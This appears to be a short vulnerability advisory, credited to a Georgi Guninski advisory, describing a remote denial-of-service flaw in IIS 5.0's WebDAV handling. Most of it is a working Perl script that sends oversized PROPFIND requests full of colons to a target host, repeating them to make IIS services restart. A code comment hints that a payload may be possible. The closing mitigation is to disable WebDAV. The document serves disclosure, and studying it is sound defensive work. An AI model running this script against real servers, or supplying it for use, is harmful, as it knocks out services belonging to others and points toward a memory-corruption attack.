Vulnerability
IIS
Affected
IIS 5.0
Description
Following is based on a Georgi Guninski security advisory #44. It
is possible to remotely restart all IIS related services using
specially crafted request. If this request is repeated
continously this seriously affects IIS performance.
Basically the problem are very long but valid propfind request
containing lots of ":".
Demonstration:
#!/usr/bin/perl
use IO::Socket;
printf "Written by Georgi Guninski wait some time\n";
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") ||
return;
$over=":" x $ll ; # the ":" is the most important
$ch=pack("C",65); # just to check whether potentail payload is possible - yes
$tmp = $ch x 64;
$over= $ch x 4 . $over . $tmp;
$over1=":" x $ll; #not sure about this
$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over1".':">';
$xml=$xml.'<a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
$l=length($xml);
$req="PROPFIND / HTTP/1\.1\nContent-type: text/xml\nHost: $host\nContent-length:
$l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,200);
print $res;
close $socket;
}
do vv(59060);
#this is overflow, repeat several times - 49060 seems the smallest #, may need to change
sleep(1);
do vv(59060);
Solution
Disabling WebDav extensions may help though we do not recommend
using IIS on the Internet.
Credits
-- UnKnown --
|